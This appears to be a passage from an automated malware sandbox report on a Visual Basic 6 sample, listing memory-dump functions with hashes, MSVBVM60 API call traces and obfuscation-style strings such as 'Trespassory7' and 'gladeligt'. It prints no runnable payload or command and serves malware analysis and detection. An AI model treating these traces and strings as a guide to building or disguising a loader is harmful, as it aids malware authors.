Uniqueness Score: -1.00%

Function 003E3F0C, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1007d70cb715446e1e0b559367ac84e84a731065e02d6aaa09b9ff247fbc6bba
Instruction ID: 7d4a7a61a822fbbc637fbd501e3b391bd5ab766ef6164ed4cfc88e8e89cbe411
Opcode Fuzzy Hash: 1007d70cb715446e1e0b559367ac84e84a731065e02d6aaa09b9ff247fbc6bba
Instruction Fuzzy Hash: DCA11E7160434A8FDF286F35C8697EABBA2FF91340F96821EDDC957254D3354986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003E8C82, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3738e0565a38b2e301be2289d34efcbf3596b746cb5bf906cd541c5ff286cc
Instruction ID: cc9c9ddaec60683949fdd027b27405cda8aa46bbe794c6d0837ade3cbc427b17
Opcode Fuzzy Hash: 4e3738e0565a38b2e301be2289d34efcbf3596b746cb5bf906cd541c5ff286cc
Instruction Fuzzy Hash: 677159316043898FEF359E39CAA43EA77A2BF95350F92412ACC4A8F255D7308945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 003E8CD5, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665d9c0a9e865c1b3527fe1bd17adf92348a1ad8c05a199dcbe32a78315cb529
Instruction ID: 7492a06a8a69fc7497cf45b3a709f09f43a20b02a729ed6fc2d2ef3b69ef3bf7
Opcode Fuzzy Hash: 665d9c0a9e865c1b3527fe1bd17adf92348a1ad8c05a199dcbe32a78315cb529
Instruction Fuzzy Hash: 197133316043898FEF359E39CAA47DA37A2BF95350F92812ACC8A8F255D3308945CB05

Uniqueness

Uniqueness Score: -1.00%

Function 003E8D58, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3e478331a0c149e20260787dc74e320075e11248712bc8a2f4a9b0d9282433
Instruction ID: 2a51cfe2854888a755eafddd40f9e98cc48b8a2bb14273dd6bd57c7c34411613
Opcode Fuzzy Hash: 4b3e478331a0c149e20260787dc74e320075e11248712bc8a2f4a9b0d9282433
Instruction Fuzzy Hash: 6061797160428A8FEF369E35C9A47DA7BA2FF95350F92817ACC898F255D330D946CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003E1B2D, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3269653db9c15913c9e10e6d08c9d666489e28f8f7ddc4dfebef25b170d33d38
Instruction ID: f73b3355a4685aca513d87432b1fa22ebe4f048854ebd7a8aba93920fca55302
Opcode Fuzzy Hash: 3269653db9c15913c9e10e6d08c9d666489e28f8f7ddc4dfebef25b170d33d38
Instruction Fuzzy Hash: ED613AB2A442899FDB318F39CC54BDB7BB7AFD5350F58422ADC8C97259D3314A468B40

Uniqueness

Uniqueness Score: -1.00%

Function 003E34C4, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1739612be62fec0426e3f77743a86624e60d1764ea225ebf32e8174df8c95114
Instruction ID: 08c06156d445a4d2456dfd55d03baa4a3b4f5e2050e8e6f4498758b8a6755d7a
Opcode Fuzzy Hash: 1739612be62fec0426e3f77743a86624e60d1764ea225ebf32e8174df8c95114
Instruction Fuzzy Hash: 40618A71644389CFDB359E368DA97DB77A7AF91340F96862ECC8587159C3308A85CB01

Uniqueness

Uniqueness Score: -1.00%

Function 003E350F, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b749c3e610fe035121be5ca76caf3bef32e7eee0d8875fd10bb0250f6c819c00
Instruction ID: 44374923693c22c369dc4dbea9b24cac2e737b20722456a2d307aa6f702a6f6d
Opcode Fuzzy Hash: b749c3e610fe035121be5ca76caf3bef32e7eee0d8875fd10bb0250f6c819c00
Instruction Fuzzy Hash: 7A519A716403499FDB308E3ACDA87DB77A7AFD5350F96822EDC8987195C3309986CB01

Uniqueness

Uniqueness Score: -1.00%

Function 003E2183, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b864eb8b61d91f5d08a4964d865556773e7bf82cb249eca9f8da1f132cfd11b
Instruction ID: a0d0569fb388d2b7aa7771a47d1ae98484793aa5dd5958989c6275dda3a319a3
Opcode Fuzzy Hash: 6b864eb8b61d91f5d08a4964d865556773e7bf82cb249eca9f8da1f132cfd11b
Instruction Fuzzy Hash: 0F5146757003858FEB349E2ACDA17DB77A7BFD93A0F95422DEC898B294C73489458701

Uniqueness

Uniqueness Score: -1.00%

Function 003E2793, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60965f03207346a198c8592a8de58e47eedf61c5fc0ede2803793b6281c7a9b0
Instruction ID: 560351280b91579682803c0d568558451644bbd821f2588ad1981d3aaeb04196
Opcode Fuzzy Hash: 60965f03207346a198c8592a8de58e47eedf61c5fc0ede2803793b6281c7a9b0
Instruction Fuzzy Hash: F541AC7160438A9FDB268E7689A53E97BA3BFA2350F24812DDDCAC7641C7308995D703

Uniqueness

Uniqueness Score: -1.00%

Function 003E8385, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34a9d2bb49952a2350a636121913e34f91c078898984afe60cf9cdc2fc2a198
Instruction ID: c120235b81c0caee671d79a73871ca964714b9a3e9e4b12839eb95ea1da168a4
Opcode Fuzzy Hash: a34a9d2bb49952a2350a636121913e34f91c078898984afe60cf9cdc2fc2a198
Instruction Fuzzy Hash: DE416635A082958FDF359F35C9A53DB7BA3AF52310F85826ACC8D4B289DB308846C712

Uniqueness

Uniqueness Score: -1.00%

Function 003E4B8E, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f237865403371c53baf511d90caa3295c9c056eb95273841278d0e95b03bb72a
Instruction ID: fe215374ed02eaec974307d35dc7fb9028b4032252dbbfb0bfec4a594ee7e0d4
Opcode Fuzzy Hash: f237865403371c53baf511d90caa3295c9c056eb95273841278d0e95b03bb72a
Instruction Fuzzy Hash: 5F41C8719002999FCF768F39CC897DA3BB2FF1A310F658229ED4D8B251C3354A958B80

Uniqueness

Uniqueness Score: -1.00%

Function 003E7B73, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fac6c25e3909cca6d4eccda6cfe5e2961e853137e6b5abca8ca2c82c12a7e7
Instruction ID: 0a863ad1085cf0cbe6c10d85ea7c3a9996e6acc40f0143b32406bcd6f0820251
Opcode Fuzzy Hash: 41fac6c25e3909cca6d4eccda6cfe5e2961e853137e6b5abca8ca2c82c12a7e7
Instruction Fuzzy Hash: D32186322046418FDB244E79C9A63DB77A6AF56360FA2461EDCC6DB295D7308985CF01

Uniqueness

Uniqueness Score: -1.00%

Function 003E844C, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0b64c744ff8e58681f4b7dfdafd50dfff910234d02cdfe5a4d071014b200cc
Instruction ID: ad60df0ab5b56e2fef62ee08f82facb91c76e5755ed8b3e6a34351ece19fee8e
Opcode Fuzzy Hash: 5e0b64c744ff8e58681f4b7dfdafd50dfff910234d02cdfe5a4d071014b200cc
Instruction Fuzzy Hash: F531A072A043814FCF349F3589953DB7B93AF61310F45829ACC998B6C9DB348446C612

Uniqueness

Uniqueness Score: -1.00%

Function 003E71A9, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2d1846fe37f4737d90b826ac92fe6bfa9fd553f583b1db54a2e33603f1f58a
Instruction ID: be6d831d0d916266683280767b1cb4154f6fca2ce09f59e6becc5034b4bd62c6
Opcode Fuzzy Hash: 1b2d1846fe37f4737d90b826ac92fe6bfa9fd553f583b1db54a2e33603f1f58a
Instruction Fuzzy Hash: A21117757447998FCB35DE29C9C4BDA73A6BF18314F81493ADE599B2A1D3309A40CA10

Uniqueness

Uniqueness Score: -1.00%

Function 003E50CA, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 003E6B93, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844a07f6066d0972c1f3af2ad6572c8dea082bba16f432667845158705520a90
Instruction ID: c74afd1e2a157885b9cdc988f14599c24a79e655c21c6cd5f458fa94a46edb96
Opcode Fuzzy Hash: 844a07f6066d0972c1f3af2ad6572c8dea082bba16f432667845158705520a90
Instruction Fuzzy Hash: 76B00275651640CFCF55CF49C594F4173B4F758750F4154D4E8518FB11C264E900CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0043540F, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00432F14,00432F0C,?,000000FF,00000000), ref: 0043546B
__vbaStrMove.MSVBVM60(00432F14,00432F0C,?,000000FF,00000000), ref: 00435475
#711.MSVBVM60(?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 0043547F
__vbaAryVar.MSVBVM60(00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 0043548D
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 0043549D
__vbaFreeStr.MSVBVM60(?,?,00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 004354A5
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 004354B4
__vbaStrCmp.MSVBVM60(00432F0C,?), ref: 004354CD
__vbaNew2.MSVBVM60(0043199C,`S_,00432F0C,?), ref: 004354E9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435501
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000048), ref: 00435521
#531.MSVBVM60(?), ref: 00435529
__vbaFreeStr.MSVBVM60(?), ref: 00435531
__vbaFreeObj.MSVBVM60(?), ref: 00435539
__vbaNew2.MSVBVM60(0043199C,`S_,00432F0C,?), ref: 00435551
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435569
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001A0), ref: 0043558F
__vbaFreeObj.MSVBVM60(00000000,00000000,00432D70,000001A0), ref: 0043559D
__vbaAryDestruct.MSVBVM60(00000000,?,004355D8), ref: 004355D2

Strings

`S_, xrefs: 004354D6, 004354DF, 004354EE, 0043553E, 00435547, 00435556

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresultNew2$#531#711CopyDestructListMove
String ID: `S_
API String ID: 1202614378-3721679040
Opcode ID: e8b982305b701467d9f06b4701d878956078b949556f327331ef9513c773eb0d
Instruction ID: 670a67046e35178a3fe736329d8735255595e13288c1414161bb6763de952726
Opcode Fuzzy Hash: e8b982305b701467d9f06b4701d878956078b949556f327331ef9513c773eb0d
Instruction Fuzzy Hash: 6E414BB1900208ABDB14EB96CD46EEEB7BCBF58304F50052BF511B71A1DB7CA9058B69

Uniqueness

Uniqueness Score: -1.00%

Function 00436103, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00432FB8,00432FB0,00000001,?), ref: 00436166
__vbaStrMove.MSVBVM60(00432FB8,00432FB0,00000001,?), ref: 00436170
__vbaStrCat.MSVBVM60(00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 0043617B
__vbaStrMove.MSVBVM60(00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 00436185
#628.MSVBVM60(00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 0043618B
__vbaStrMove.MSVBVM60(00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 00436195
__vbaStrCmp.MSVBVM60(00432FB0,00000000,00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 0043619C
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00432FB0,00000000,00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 004361B9
__vbaFreeVar.MSVBVM60(?), ref: 004361C4
__vbaNew2.MSVBVM60(0043199C,`S_,?), ref: 004361E5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004361FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CE8,00000100), ref: 00436223
__vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,00432CE8,00000100), ref: 00436254
__vbaHresultCheckObj.MSVBVM60(00000000,004012B0,00432758,000002C0,?,?,?,00000000), ref: 00436293
__vbaFreeObj.MSVBVM60(?,?,?,00000000), ref: 0043629B

Strings

`S_, xrefs: 004361D2, 004361DB, 004361EA

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$FreeMove$CheckHresult$#628ListNew2
String ID: `S_
API String ID: 2062027099-3721679040
Opcode ID: 6d04005a70cb3e85452221807574a480980c37bbdbf1ecefcb323d72518eeb92
Instruction ID: 81f3ed2391a281d05d79455daf37f34854cbe74ca8376e7805096f1d9f08af89
Opcode Fuzzy Hash: 6d04005a70cb3e85452221807574a480980c37bbdbf1ecefcb323d72518eeb92
Instruction Fuzzy Hash: BB41AFB1941209ABCB10EBA2DD49EAEBBBCFF18304F11456BF441F31B1CB7859008B68

Uniqueness

Uniqueness Score: -1.00%

Function 00435873, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00432E4C,0043746C), ref: 004358BB
__vbaHresultCheckObj.MSVBVM60(00000000,0026F6F4,00432E3C,00000014), ref: 004358DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432F18,00000058), ref: 00435902
__vbaStrMove.MSVBVM60 ref: 00435910
__vbaFreeObj.MSVBVM60 ref: 00435918
__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00435930
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435948
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432DFC,00000058), ref: 00435968
__vbaFreeObj.MSVBVM60 ref: 00435976
__vbaFreeStr.MSVBVM60(0043599D), ref: 00435997

Strings

`S_, xrefs: 0043591D, 00435926, 00435935

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$New2$Move
String ID: `S_
API String ID: 2227187868-3721679040
Opcode ID: 430a7616afbe833805e02dd6168955eeb7b036181c061a8c5814e46a74f10c75
Instruction ID: e2bfae0f4101442dca42f6758713ee20e81d50469c9c497414c0ec7910315bcb
Opcode Fuzzy Hash: 430a7616afbe833805e02dd6168955eeb7b036181c061a8c5814e46a74f10c75
Instruction Fuzzy Hash: DC3183B0940608ABCB14EB96CD46EEEBBB8FF5C714F20541AF001B72A1D67C6905CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00435FE5, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

#589.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,004012D6), ref: 0043602A
__vbaNew2.MSVBVM60(00432E4C,0043746C,00000001), ref: 00436048
__vbaHresultCheckObj.MSVBVM60(00000000,0026F6F4,00432E3C,0000004C), ref: 0043606C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432E5C,00000024), ref: 00436099
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004012D6), ref: 004360A7
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004012D6), ref: 004360AF
__vbaFreeStr.MSVBVM60(004360DC,00000001), ref: 004360D6

Strings

Trespassory7, xrefs: 0043607A
Gennemlyste, xrefs: 0043607F
3+, xrefs: 004360B4

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$#589MoveNew2
String ID: 3+$Gennemlyste$Trespassory7
API String ID: 1767156754-2597507220
Opcode ID: 6188ff39680287c379815e40fd7289bf2624903344a69b81474d934b1529f430
Instruction ID: 3471bc53f4aeaa4db11e57cc4609061d4264d4da27a59fec6320d76ae3109752
Opcode Fuzzy Hash: 6188ff39680287c379815e40fd7289bf2624903344a69b81474d934b1529f430
Instruction Fuzzy Hash: 62213070940215ABCB14EF95C946EAEBBF8EF58704F20915AF500B72A1C7BC69058B69

Uniqueness

Uniqueness Score: -1.00%

Function 004355F5, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00435648
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435660
__vbaNew2.MSVBVM60(0043199C,`S_,?,00000000), ref: 00435688
__vbaObjSet.MSVBVM60(?,00000000), ref: 004356A0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000000A8), ref: 004356C6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001EC), ref: 004356F5
__vbaFreeStr.MSVBVM60 ref: 004356FD
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0043570C

Strings

`S_, xrefs: 0043562C, 0043563E, 0043564D, 00435667, 0043567E, 0043568D

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID: `S_
API String ID: 2509323985-3721679040
Opcode ID: 22c47779e16a48da59080eae7ece68f07901b2efce5f57e95725ca6924f4b971
Instruction ID: 708b0d6b0c6f0b816a4a683f31335bf59e457f10f7f9e5477d2025cbc020b1a9
Opcode Fuzzy Hash: 22c47779e16a48da59080eae7ece68f07901b2efce5f57e95725ca6924f4b971
Instruction Fuzzy Hash: F231B4B4940608ABCB10EF96CC46FAEBBBCFF09704F50442AF445E72A1C77C95018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004362ED, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00432E4C,0043746C), ref: 0043633C
__vbaHresultCheckObj.MSVBVM60(00000000,0026F6F4,00432E3C,00000014), ref: 00436360
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432F18,00000050), ref: 00436383
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0043638C
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0043639D
__vbaFreeObj.MSVBVM60(00000000,?), ref: 004363A5
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000CC,gladeligt,00000000,?), ref: 004363BD

Strings

gladeligt, xrefs: 004363AF

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$FileNew2Open
String ID: gladeligt
API String ID: 1550884760-4246425414
Opcode ID: fa585a13a9395edeb2ac73d640f44a518a756dedc099ceb816f04c52ed2ca9f3
Instruction ID: 45d114d4640ba2e7366dfde682ae0c95f6d5cfbfff4ac18c4abef8451f5296b5
Opcode Fuzzy Hash: fa585a13a9395edeb2ac73d640f44a518a756dedc099ceb816f04c52ed2ca9f3
Instruction Fuzzy Hash: 3621F570940615BBDB10EB95CC46EAFBBB8EF58708F20911BF911B72E1C6BC58018A99

Uniqueness

Uniqueness Score: -1.00%

Function 00435D74, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00435DAA
__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00435DC2
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435DDA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D60,0000022C), ref: 00435DFC
__vbaFreeObj.MSVBVM60 ref: 00435E04
__vbaFreeStr.MSVBVM60(00435E22), ref: 00435E1C

Strings

`S_, xrefs: 00435DAF, 00435DB8, 00435DC7

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckCopyHresultNew2
String ID: `S_
API String ID: 4138333463-3721679040
Opcode ID: d8ed7a9092747571caf9ad5dfeb990a9355afcb156c795ab5e33ff62888f2ae5
Instruction ID: 05641ab9ac4bc3e4dc0d04d4b7b18c034fbc1e74a87b7ace31424ff4c2f6553e
Opcode Fuzzy Hash: d8ed7a9092747571caf9ad5dfeb990a9355afcb156c795ab5e33ff62888f2ae5
Instruction Fuzzy Hash: 3E115274500608ABC714EBA6CD4AFAF77B8EF08748F60447AF051B71A2D7785A0486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00435C3B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00435C7A
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435C92
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001EC), ref: 00435CD3
__vbaFreeObj.MSVBVM60 ref: 00435CDB

Strings

`S_, xrefs: 00435C63, 00435C70, 00435C7F
Polyodontidae9, xrefs: 00435CB4

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Polyodontidae9$`S_
API String ID: 1645334062-1807212442
Opcode ID: b38f728eae063f83350498a2bb74d5176519adce6a36ebd00b32a54f0569f7ed
Instruction ID: d8f63dadd0c7f86bd8fcc0d0bcd8b6351cbec3edceae88e64d0f90caf6119d0b
Opcode Fuzzy Hash: b38f728eae063f83350498a2bb74d5176519adce6a36ebd00b32a54f0569f7ed
Instruction Fuzzy Hash: 2C1173B0540704ABDB10DF95CE46BAF76BCEB09708F60146AF401B71A1D2B859018769

Uniqueness

Uniqueness Score: -1.00%

Function 00435A7D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_), ref: 00435ABC
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435AD4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001EC), ref: 00435B15
__vbaFreeObj.MSVBVM60 ref: 00435B1D

Strings

BNHRER, xrefs: 00435AF6
`S_, xrefs: 00435AA5, 00435AB2, 00435AC1

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: BNHRER$`S_
API String ID: 1645334062-824504439
Opcode ID: 81fc4d986dd3457e5cdba8d07544aedaa8c22a35fcc032520ac56dd30198363a
Instruction ID: 48bdf528161e98126a0c8465fdf0cc7ba51ed57cd699bd72c4aea50de1452adc
Opcode Fuzzy Hash: 81fc4d986dd3457e5cdba8d07544aedaa8c22a35fcc032520ac56dd30198363a
Instruction Fuzzy Hash: 2E1186B4640704ABD710EF95CD46FAF76BCEB09744F10046AF411B7191D3BC6A0086A9

Uniqueness

Uniqueness Score: -1.00%

Function 00435754, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`S_), ref: 004357A4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004357BC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,000001CC), ref: 00435826
__vbaFreeObj.MSVBVM60 ref: 0043582E

Strings

`S_, xrefs: 0043578B, 0043579A, 004357A9

Memory Dump Source

Source File: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2360254906.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2360277361.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2360281868.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

